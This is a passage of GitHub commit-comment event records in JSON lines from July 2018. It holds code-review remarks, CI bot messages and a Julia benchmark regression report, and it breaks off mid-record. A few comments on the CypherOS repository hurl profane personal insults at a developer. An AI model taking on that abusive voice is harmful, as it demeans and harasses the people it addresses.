{"id":"7962353646","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"openmrs/openmrs-module-locationbasedaccess"},"payload":{"comment":{"id":29700437,"position":13,"line":57,"path":"api/src/main/java/org/openmrs/module/locationbasedaccess/PatientSearchAdviser.java","commit_id":"dc1f2548225252ed3356e967bee0e402c2f4d8a6","created_at":"2018-07-13T14:03:56Z","updated_at":"2018-07-13T14:03:56Z","author_association":"MEMBER","body":"I think you can get a NPE, note that Context.getAuthenticatedUser() can return null if there is no authenticated user, and you are passing the return value to Daemon.isDaemonUser()"}},"created_at":"2018-07-13T14:03:56Z"}
{"id":"7962357842","type":"CommitCommentEvent","actor":{"login":"remore"},"repo":{"name":"remore/openwhisk-runtime-ruby"},"payload":{"comment":{"id":29700453,"position":41,"line":41,"path":".travis.yml","commit_id":"1bef0b30121e03e9ac496682b895f41677443271","created_at":"2018-07-13T14:04:42Z","updated_at":"2018-07-13T14:04:42Z","author_association":"OWNER","body":"got it."}},"created_at":"2018-07-13T14:04:42Z"}
{"id":"7962361142","type":"CommitCommentEvent","actor":{"login":"remore"},"repo":{"name":"remore/openwhisk-runtime-ruby"},"payload":{"comment":{"id":29700464,"position":34,"line":34,"path":"tools/travis/publish.sh","commit_id":"1bef0b30121e03e9ac496682b895f41677443271","created_at":"2018-07-13T14:05:17Z","updated_at":"2018-07-13T14:05:17Z","author_association":"OWNER","body":"ooops. I will fix it soon"}},"created_at":"2018-07-13T14:05:17Z"}
{"id":"7962361329","type":"CommitCommentEvent","actor":{"login":"simpko"},"repo":{"name":"jynnie/accountability"},"payload":{"comment":{"id":29700465,"position":null,"line":null,"path":null,"commit_id":"5815e68e5801c0c68a85a98c49de18ca463e8d62","created_at":"2018-07-13T14:05:19Z","updated_at":"2018-07-13T14:05:19Z","author_association":"COLLABORATOR","body":"がんばって "}},"created_at":"2018-07-13T14:05:19Z"}
{"id":"7962362506","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29700466,"position":null,"line":null,"path":null,"commit_id":"8899cc7613b06c840d9d267c812491f079e9009f","created_at":"2018-07-13T14:05:33Z","updated_at":"2018-07-13T14:05:33Z","author_association":"OWNER","body":"@cnuke: please add to your dde_linux_update branch"}},"created_at":"2018-07-13T14:05:33Z"}
{"id":"7962363000","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29700468,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-13T14:05:39Z","updated_at":"2018-07-13T14:05:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T14:05:39Z"}
{"id":"7962364119","type":"CommitCommentEvent","actor":{"login":"katzyn"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":29700473,"position":11,"line":417,"path":"h2/src/main/org/h2/expression/Operation.java","commit_id":"e647b73b8397f700eced48cbdb2f677b73024810","created_at":"2018-07-13T14:05:51Z","updated_at":"2018-07-13T14:05:51Z","author_association":"CONTRIBUTOR","body":"This method was copied from `ConditionAndOr` as is. So it should be changed too.\r\n\r\nI did not understand what you suggest. Add a couple of methods instead of shared one or what?"}},"created_at":"2018-07-13T14:05:51Z"}
{"id":"7962365519","type":"CommitCommentEvent","actor":{"login":"Totktonada"},"repo":{"name":"tarantool/tarantool"},"payload":{"comment":{"id":29700478,"position":5,"line":225,"path":"src/lua/init.c","commit_id":"c0b9b7681a21a06339a3e3b5e183597951a810d6","created_at":"2018-07-13T14:06:07Z","updated_at":"2018-07-13T14:06:07Z","author_association":"MEMBER","body":"```\r\nif (result > -((unsigned long long) LLONG_MIN))\r\n```"}},"created_at":"2018-07-13T14:06:07Z"}
{"id":"7962367334","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29700487,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-13T14:06:26Z","updated_at":"2018-07-13T14:06:26Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T14:06:26Z"}
{"id":"7962368890","type":"CommitCommentEvent","actor":{"login":"josenberg"},"repo":{"name":"josenberg/c_language_course"},"payload":{"comment":{"id":29700489,"position":15,"line":11,"path":"reading_input.c","commit_id":"5db988ebddcc9f7c3a4704556b1850ea17ba6f95","created_at":"2018-07-13T14:06:44Z","updated_at":"2018-07-13T14:06:44Z","author_association":"OWNER","body":"Yep, that's right.\r\n\r\nLuck me that in the slide the code using '%lf'[0], but thank you, its good to know that someone actually read this. :)\r\n\r\n[0] - https://docs.google.com/presentation/d/1BbZs3M8CqMBcWhctoH6xkEBrQJK1Uq_MP8IpuHAhDKE/edit#slide=id.g3bc7c01d36_1_155"}},"created_at":"2018-07-13T14:06:44Z"}
{"id":"7962369086","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29700491,"position":18,"line":281,"path":"src/devices/machine/i8255.cpp","commit_id":"7b42461543a1ff14ac99886d697f45f6d34efb18","created_at":"2018-07-13T14:06:46Z","updated_at":"2018-07-13T14:06:46Z","author_association":"MEMBER","body":"Now you've got a constructor parameter that does nothing here, which shouldn't be in the public constructor anyway since the AMS40489 PPI is a different device type.  I'm cleaning this up myself and getting rid of the zero-value comments anyway."}},"created_at":"2018-07-13T14:06:46Z"}
{"id":"7962370457","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29700493,"position":null,"line":null,"path":null,"commit_id":"8160f0c8ecd9542eea0f189f742eff014237da4e","created_at":"2018-07-13T14:07:02Z","updated_at":"2018-07-13T14:07:02Z","author_association":"OWNER","body":"@cnuke: please add to your dde_linux_update branch"}},"created_at":"2018-07-13T14:07:02Z"}
{"id":"7962373313","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29700501,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-13T14:07:30Z","updated_at":"2018-07-13T14:07:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T14:07:30Z"}
{"id":"7962385388","type":"CommitCommentEvent","actor":{"login":"brianhlin"},"repo":{"name":"opensciencegrid/user-school-2018"},"payload":{"comment":{"id":29700533,"position":null,"line":null,"path":null,"commit_id":"0fc67c5f3b154be44342163494f898e9e0aedc86","created_at":"2018-07-13T14:09:41Z","updated_at":"2018-07-13T14:09:41Z","author_association":"MEMBER","body":"Nope, I get the same broken behavior with and without `:::file`"}},"created_at":"2018-07-13T14:09:41Z"}
{"id":"7962386046","type":"CommitCommentEvent","actor":{"login":"grandinj"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":29700536,"position":11,"line":417,"path":"h2/src/main/org/h2/expression/Operation.java","commit_id":"e647b73b8397f700eced48cbdb2f677b73024810","created_at":"2018-07-13T14:09:48Z","updated_at":"2018-07-13T14:09:48Z","author_association":"CONTRIBUTOR","body":"yes, use two methods rather than one is what I meant"}},"created_at":"2018-07-13T14:09:48Z"}
{"id":"7962399001","type":"CommitCommentEvent","actor":{"login":"vondele"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29700555,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-13T14:12:12Z","updated_at":"2018-07-13T14:12:12Z","author_association":"OWNER","body":"@noobpwnftw do you have an idea on how to do this automatically before the state is such that it triggers timeouts ? \r\n\r\nRight now, unless you need it for further testing, I propose to stop the test and purge the results. At the current state it presumably is not very useful."}},"created_at":"2018-07-13T14:12:12Z"}
{"id":"7962406683","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29700568,"position":null,"line":null,"path":null,"commit_id":"229c9551b3af39a3f73a211570e03c74f61ef000","created_at":"2018-07-13T14:13:37Z","updated_at":"2018-07-13T14:13:37Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180713-141336 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180713-141336\") to [dev](https://console.bluemix.net/apps/96cee717-1d19-45aa-bb0b-82acaded2ab6?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-13T14:13:37Z"}
{"id":"7962406846","type":"CommitCommentEvent","actor":{"login":"mkassner"},"repo":{"name":"pupil-labs/pupil"},"payload":{"comment":{"id":29700570,"position":null,"line":null,"path":null,"commit_id":"ce949dd72a72566129c0e873eb5160125a883daf","created_at":"2018-07-13T14:13:39Z","updated_at":"2018-07-13T14:13:39Z","author_association":"MEMBER","body":"1) I doubt that. Dequeue is only faster when adding, removing from the beginning, adding remving from the end should have same speed (according to docs.)\r\n2) this was intended. Sometimes world timestamps start, stop at a diffreent time, my approach perserves datapoints outside this range. also I can get rid of np.clip this way."}},"created_at":"2018-07-13T14:13:39Z"}
{"id":"7962407143","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/rasterio-feedstock"},"payload":{"comment":{"id":29700571,"position":null,"line":null,"path":null,"commit_id":"88ea3b318346416111b1c8d9dd5c6b2252e89c59","created_at":"2018-07-13T14:13:43Z","updated_at":"2018-07-13T14:13:43Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @snowman2 were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-13T14:13:43Z"}
{"id":"7962408638","type":"CommitCommentEvent","actor":{"login":"Toro2018"},"repo":{"name":"Toro2018/toDoList"},"payload":{"comment":{"id":29700576,"position":null,"line":null,"path":null,"commit_id":"7cbd1e60c6e192d3fd7116cb8eb732d52f9cfce4","created_at":"2018-07-13T14:13:59Z","updated_at":"2018-07-13T14:13:59Z","author_association":"OWNER","body":"The code is from the homework by \"The Complete Web Developer in 2018: Zero to Mastery | Udemy\"\r\ninput the things-to-do in the box and press \"enter\" or click the \"button\" besides\r\n1. If you click on the list item, it toggles the .done  class on and off.\r\n2. Add buttons next to each list item to delete the item when clicked on its corresponding delete button.\r\n3. When adding a new list item, it automatically adds the delete button next to it. "}},"created_at":"2018-07-13T14:13:59Z"}
{"id":"7962432233","type":"CommitCommentEvent","actor":{"login":"Yashika31"},"repo":{"name":"Yashika31/RepData_PeerAssessment1"},"payload":{"comment":{"id":29700635,"position":81,"line":78,"path":"README.md","commit_id":"a7035a173d099bd0c61e0d6ec13d1f01d8238032","created_at":"2018-07-13T14:18:02Z","updated_at":"2018-07-13T14:18:02Z","author_association":"OWNER","body":"njbjb"}},"created_at":"2018-07-13T14:18:02Z"}
{"id":"7962437813","type":"CommitCommentEvent","actor":{"login":"iamchriskanger"},"repo":{"name":"CypherOS/frameworks_base"},"payload":{"comment":{"id":29700642,"position":null,"line":null,"path":null,"commit_id":"a844228d0e20cf358ff6f424819b8d3a629cc812","created_at":"2018-07-13T14:18:59Z","updated_at":"2018-07-13T14:18:59Z","author_association":"NONE","body":"Wow sar what a kang nice.. u say dot is kang but u knw what u r kanging urself lol fuck u nub.. take a loot at ur project before saying dot is kang\r\n\r\nhttps://github.com/DirtyUnicorns/android_frameworks_base/commit/a65091e9d35178f795929a39f26aed4f636335c7#diff-254f5c602fc359b5355d1be6d2bf7971"}},"created_at":"2018-07-13T14:18:59Z"}
{"id":"7962440239","type":"CommitCommentEvent","actor":{"login":"sevenenn"},"repo":{"name":"sevenenn/pass"},"payload":{"comment":{"id":29700650,"position":null,"line":null,"path":null,"commit_id":"211efac8d9dcff88fb0d19cbcabd3fb956cac40b","created_at":"2018-07-13T14:19:24Z","updated_at":"2018-07-13T14:19:24Z","author_association":"OWNER","body":"back"}},"created_at":"2018-07-13T14:19:24Z"}
{"id":"7962442693","type":"CommitCommentEvent","actor":{"login":"zarubaf"},"repo":{"name":"pulp-platform/style-guidelines"},"payload":{"comment":{"id":29700656,"position":54,"line":93,"path":"README.md","commit_id":"19f16281a889ebeffdfd4aea381a6026408c3d2a","created_at":"2018-07-13T14:19:51Z","updated_at":"2018-07-13T14:19:51Z","author_association":"MEMBER","body":"My intention was exactly to bring our SG to a closer form of what is being cooked up somewhere else, just to minimize a later adaption process. We should be aligned on the most things except for the 4 vs. 2 space indentation where I have no hard feelings and I am happy to change this. I think we are all in agreement that we are not gonna argue about small style-preferences, but I had the feeling we needed to tighten up and align this spec a little more. That is what this PR is about."}},"created_at":"2018-07-13T14:19:51Z"}
{"id":"7962444845","type":"CommitCommentEvent","actor":{"login":"Ir1d"},"repo":{"name":"Ir1d/OI-wiki"},"payload":{"comment":{"id":29700660,"position":null,"line":null,"path":null,"commit_id":"d93f1c0cbccb2ee15756f94afa2316f2779f6fdf","created_at":"2018-07-13T14:20:14Z","updated_at":"2018-07-13T14:20:14Z","author_association":"OWNER","body":"XD"}},"created_at":"2018-07-13T14:20:14Z"}
{"id":"7962447203","type":"CommitCommentEvent","actor":{"login":"iamchriskanger"},"repo":{"name":"CypherOS/frameworks_base"},"payload":{"comment":{"id":29700666,"position":null,"line":null,"path":null,"commit_id":"d5f249f25fdc40c452f14f1b2bf45ccc335d6ace","created_at":"2018-07-13T14:20:37Z","updated_at":"2018-07-13T14:20:37Z","author_association":"NONE","body":"@MSF-Jarvis @ezio84 @Mazda-- @mohancm @samgrande see this guy not giving authorship and calls dot as kang fuck u asshole"}},"created_at":"2018-07-13T14:20:37Z"}
{"id":"7962450425","type":"CommitCommentEvent","actor":{"login":"bnair2001"},"repo":{"name":"bnair2001/portal"},"payload":{"comment":{"id":29700671,"position":null,"line":null,"path":null,"commit_id":"67c0aeb1e75578025eca3c7bef7928c8f67bc70f","created_at":"2018-07-13T14:21:12Z","updated_at":"2018-07-13T14:21:12Z","author_association":"OWNER","body":"Yup this one's perfect"}},"created_at":"2018-07-13T14:21:12Z"}
{"id":"7962459262","type":"CommitCommentEvent","actor":{"login":"VS6785"},"repo":{"name":"VS6785/VS6785.github.io"},"payload":{"comment":{"id":29700685,"position":null,"line":null,"path":null,"commit_id":"71d419e7a5f12a2d2009c7971f897b0902161435","created_at":"2018-07-13T14:22:47Z","updated_at":"2018-07-13T14:22:47Z","author_association":"OWNER","body":"update CNAME"}},"created_at":"2018-07-13T14:22:47Z"}
{"id":"7962459889","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29700686,"position":36,"line":36,"path":"lesson10/validation.rb","commit_id":"c6ee44b44a7bb82e6becd3c34f083fd8b913220a","created_at":"2018-07-13T14:22:53Z","updated_at":"2018-07-13T14:22:53Z","author_association":"NONE","body":"метод `validate!` должен запускать валидации доступные классу сам по себе, без передачи ему блока\r\nдругими словами у класса должны быть добавлены методы валидации (с помощью твоего моуля), которые `validate!` должен последовательно вызвать\r\nон должен отработать точно также, как он работал в теме \"Исключения\" - пишешь где-то в `initialize` вызов `validate!`, происходит запуск всех доступных валидаций\r\n"}},"created_at":"2018-07-13T14:22:53Z"}
{"id":"7962460257","type":"CommitCommentEvent","actor":{"login":"MartenM"},"repo":{"name":"MartenM/RedirectPlus"},"payload":{"comment":{"id":29700687,"position":null,"line":null,"path":null,"commit_id":"7b2da34412ebe5f1db670aa626eae45e26d6dd48","created_at":"2018-07-13T14:22:57Z","updated_at":"2018-07-13T14:22:57Z","author_association":"OWNER","body":"Gotta love seeing this commit message."}},"created_at":"2018-07-13T14:22:57Z"}
{"id":"7962463409","type":"CommitCommentEvent","actor":{"login":"JohnnySanttana72"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29700693,"position":null,"line":null,"path":null,"commit_id":"f2dc8dd70d372798bfa6bf8b13751c2cfd9c1238","created_at":"2018-07-13T14:23:31Z","updated_at":"2018-07-13T14:23:31Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Checar responsividade das telas](https://trello.com/c/Ng1N616T/204-checar-responsividade-das-telas)"}},"created_at":"2018-07-13T14:23:31Z"}
{"id":"7962465450","type":"CommitCommentEvent","actor":{"login":"iamchriskanger"},"repo":{"name":"CypherOS/frameworks_base"},"payload":{"comment":{"id":29700695,"position":null,"line":null,"path":null,"commit_id":"57946702f09db66ec176ab153f3efd45c1cadd84","created_at":"2018-07-13T14:23:52Z","updated_at":"2018-07-13T14:23:52Z","author_association":"NONE","body":"wow switch by christhekanger https://github.com/nitrogen-project/android_frameworks_base/commit/097f5e2fc41f647e9e2df6fcbec254f18326decf\r\n\r\nnot even credits to @xyyx "}},"created_at":"2018-07-13T14:23:52Z"}
{"id":"7962471574","type":"CommitCommentEvent","actor":{"login":"fire-eggs"},"repo":{"name":"d2phap/ImageGlass"},"payload":{"comment":{"id":29700713,"position":null,"line":null,"path":null,"commit_id":"773516efce7b31cb47472d7aad8c7f894fa66a65","created_at":"2018-07-13T14:24:58Z","updated_at":"2018-07-13T14:24:58Z","author_association":"COLLABORATOR","body":"Says \"merge 6.0 into develop\" but I'm pretty sure I did it the other way around ..."}},"created_at":"2018-07-13T14:24:58Z"}
{"id":"7962472777","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29700715,"position":37,"line":37,"path":"lesson10/validation.rb","commit_id":"c6ee44b44a7bb82e6becd3c34f083fd8b913220a","created_at":"2018-07-13T14:25:11Z","updated_at":"2018-07-13T14:25:11Z","author_association":"NONE","body":"нет смысла отлавливать ошибки там же, где их выбрасываешь )))\r\nошибки нужно отлавливать в коде, который вызывает тот код, который может выбросить ошибки\r\nвспомни тему \"Исключения\"\r\nошибки выбрасывались методами валидации и отлавливались в интерфейсе, потому что это он запускал создание объектов (и при создании объектов происходила валидация и возможные ошибки)\r\n"}},"created_at":"2018-07-13T14:25:11Z"}
{"id":"7962496589","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29700783,"position":18,"line":18,"path":"lesson10/validation.rb","commit_id":"c6ee44b44a7bb82e6becd3c34f083fd8b913220a","created_at":"2018-07-13T14:29:18Z","updated_at":"2018-07-13T14:29:18Z","author_association":"NONE","body":"главная ошибка твоего модуля на текущий момент в том, что валидации будут вызываться прямо в момент прочтения класса... у тебя же метод `validate` будет написан на уровне класса... \r\nзначит при запуске интерпретатора руби класс будет прочитан, метод будет запущен с переданными аргументами\r\nа должны проверки происходить при вызове метода `validate!`"}},"created_at":"2018-07-13T14:29:18Z"}
{"id":"7962499366","type":"CommitCommentEvent","actor":{"login":"d2phap"},"repo":{"name":"d2phap/ImageGlass"},"payload":{"comment":{"id":29700790,"position":null,"line":null,"path":null,"commit_id":"773516efce7b31cb47472d7aad8c7f894fa66a65","created_at":"2018-07-13T14:29:45Z","updated_at":"2018-07-13T14:29:45Z","author_association":"OWNER","body":"No problem. Thank you so much 👍 "}},"created_at":"2018-07-13T14:29:45Z"}
{"id":"7962499379","type":"CommitCommentEvent","actor":{"login":"fire-eggs"},"repo":{"name":"d2phap/ImageGlass"},"payload":{"comment":{"id":29700791,"position":null,"line":null,"path":null,"commit_id":"773516efce7b31cb47472d7aad8c7f894fa66a65","created_at":"2018-07-13T14:29:45Z","updated_at":"2018-07-13T14:29:45Z","author_association":"COLLABORATOR","body":"OK, so how can we un-do the 6.0 -> Dev side ?"}},"created_at":"2018-07-13T14:29:45Z"}
{"id":"7962502980","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29700799,"position":18,"line":18,"path":"lesson10/validation.rb","commit_id":"c6ee44b44a7bb82e6becd3c34f083fd8b913220a","created_at":"2018-07-13T14:30:22Z","updated_at":"2018-07-13T14:30:22Z","author_association":"NONE","body":"остальные проблемы следуют из этой... "}},"created_at":"2018-07-13T14:30:22Z"}
{"id":"7962504589","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29700801,"position":18,"line":18,"path":"lesson10/validation.rb","commit_id":"c6ee44b44a7bb82e6becd3c34f083fd8b913220a","created_at":"2018-07-13T14:30:37Z","updated_at":"2018-07-13T14:30:37Z","author_association":"NONE","body":"поэтому давай начнем с нее"}},"created_at":"2018-07-13T14:30:37Z"}
{"id":"7962506100","type":"CommitCommentEvent","actor":{"login":"constantin-ciobotaru"},"repo":{"name":"Activiti/activiti-cloud-org-service"},"payload":{"comment":{"id":29700802,"position":20,"line":34,"path":"activiti-cloud-services-org/activiti-cloud-services-org-jpa/src/main/java/org/activiti/cloud/services/organization/entity/ApplicationEntity.java","commit_id":"44440e902ef9e7cdea56193381a58a0251ab8286","created_at":"2018-07-13T14:30:52Z","updated_at":"2018-07-13T14:30:52Z","author_association":"CONTRIBUTOR","body":"👍 Good point, thanks."}},"created_at":"2018-07-13T14:30:52Z"}
{"id":"7962510977","type":"CommitCommentEvent","actor":{"login":"d2phap"},"repo":{"name":"d2phap/ImageGlass"},"payload":{"comment":{"id":29700815,"position":null,"line":null,"path":null,"commit_id":"773516efce7b31cb47472d7aad8c7f894fa66a65","created_at":"2018-07-13T14:31:42Z","updated_at":"2018-07-13T14:31:42Z","author_association":"OWNER","body":"No need to undo, just continue. Don't need to waste time to this kind of thing :)"}},"created_at":"2018-07-13T14:31:42Z"}
{"id":"7962511511","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29700818,"position":4,"line":4,"path":"lesson4/cargoTrain.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T14:31:47Z","updated_at":"2018-07-13T14:31:47Z","author_association":"NONE","body":"Тебе нужно, что-б подкласс отвечал на метод type. Зачем он в инициализации, если ты и так знаешь, что когда создаешь CargoTrain - тип будет :cargo ?"}},"created_at":"2018-07-13T14:31:47Z"}
{"id":"7962515833","type":"CommitCommentEvent","actor":{"login":"zemanj"},"repo":{"name":"numpy/numpy"},"payload":{"comment":{"id":29700823,"position":null,"line":null,"path":null,"commit_id":"1f41265ddac77a66e2bf735ce970952d0f067122","created_at":"2018-07-13T14:32:32Z","updated_at":"2018-07-13T14:32:32Z","author_association":"NONE","body":"LGTM!"}},"created_at":"2018-07-13T14:32:32Z"}
{"id":"7962525402","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29700845,"position":6,"line":6,"path":"lesson4/route.rb","commit_id":"f48aa84ccb3665fc6ebb8b2846b50c03980f7c58","created_at":"2018-07-13T14:34:16Z","updated_at":"2018-07-13T14:34:16Z","author_association":"NONE","body":"Зачем тебе attr_writer? Первая и последнии станции не меняются.\r\n```\r\ndef first_station\r\n  @stations.first\r\nend\r\n```"}},"created_at":"2018-07-13T14:34:16Z"}
{"id":"7962537000","type":"CommitCommentEvent","actor":{"login":"nicolodavis"},"repo":{"name":"google/boardgame.io"},"payload":{"comment":{"id":29700871,"position":null,"line":null,"path":null,"commit_id":"a8431c761a72649e5d50283421a034f469ea4208","created_at":"2018-07-13T14:36:17Z","updated_at":"2018-07-13T14:36:17Z","author_association":"COLLABORATOR","body":"Fixes #233 "}},"created_at":"2018-07-13T14:36:17Z"}
{"id":"7962538403","type":"CommitCommentEvent","actor":{"login":"papr"},"repo":{"name":"pupil-labs/pupil"},"payload":{"comment":{"id":29700875,"position":null,"line":null,"path":null,"commit_id":"ce949dd72a72566129c0e873eb5160125a883daf","created_at":"2018-07-13T14:36:32Z","updated_at":"2018-07-13T14:36:32Z","author_association":"MEMBER","body":"1. I agree that this is negligible\r\n2. It is ok to sample in the pupil timestamps. My issue is using them as `xlim`. `xlim` is used to scale time to start and stop of the timeline in pixel values. All timelines share the same pixel bounds in X. If you use different timestamp bounds the timelines will be scaled physically on the screen and be misaligned."}},"created_at":"2018-07-13T14:36:32Z"}
{"id":"7962540166","type":"CommitCommentEvent","actor":{"login":"chriselrod"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29700878,"position":null,"line":null,"path":null,"commit_id":"9277d3af2dcfc107021989473829a6c9454d83fb","created_at":"2018-07-13T14:36:51Z","updated_at":"2018-07-13T14:36:51Z","author_association":"NONE","body":"This commit causes a severe regression for `SIMD.jl`.\r\nBefore this commit:\r\n```julia\r\njulia> @benchmark smul!($D32x6, $A32x32, $X32x6)\r\nBenchmarkTools.Trial: \r\n  memory estimate:  0 bytes\r\n  allocs estimate:  0\r\n  --------------\r\n  minimum time:     116.412 ns (0.00% GC)\r\n  median time:      116.647 ns (0.00% GC)\r\n  mean time:        118.251 ns (0.00% GC)\r\n  maximum time:     170.740 ns (0.00% GC)\r\n  --------------\r\n  samples:          10000\r\n  evals/sample:     916\r\n\r\njulia> @benchmark smul!($D96x96, $A96x128, $X128x96)\r\nBenchmarkTools.Trial: \r\n  memory estimate:  0 bytes\r\n  allocs estimate:  0\r\n  --------------\r\n  minimum time:     19.515 μs (0.00% GC)\r\n  median time:      19.634 μs (0.00% GC)\r\n  mean time:        19.822 μs (0.00% GC)\r\n  maximum time:     63.956 μs (0.00% GC)\r\n  --------------\r\n  samples:          10000\r\n  evals/sample:     1\r\n\r\n```\r\nAfter:\r\n```julia\r\njulia> @benchmark smul!($D32x6, $A32x32, $X32x6)\r\nBenchmarkTools.Trial: \r\n  memory estimate:  0 bytes\r\n  allocs estimate:  0\r\n  --------------\r\n  minimum time:     1.475 μs (0.00% GC)\r\n  median time:      1.501 μs (0.00% GC)\r\n  mean time:        1.526 μs (0.00% GC)\r\n  maximum time:     3.671 μs (0.00% GC)\r\n  --------------\r\n  samples:          10000\r\n  evals/sample:     10\r\n\r\njulia> @benchmark smul!($D96x96, $A96x128, $X128x96)\r\nBenchmarkTools.Trial: \r\n  memory estimate:  0 bytes\r\n  allocs estimate:  0\r\n  --------------\r\n  minimum time:     267.302 μs (0.00% GC)\r\n  median time:      268.539 μs (0.00% GC)\r\n  mean time:        271.203 μs (0.00% GC)\r\n  maximum time:     395.263 μs (0.00% GC)\r\n  --------------\r\n  samples:          10000\r\n  evals/sample:     1\r\n\r\n```\r\n\r\nWhile not as bad, the example from SIMD.jl's README is enough to reproduce (I'd be happy to share the code for the above examples as well, but the following is shorter):\r\n```julia\r\njulia> using SIMD, BenchmarkTools\r\n\r\njulia> const V = 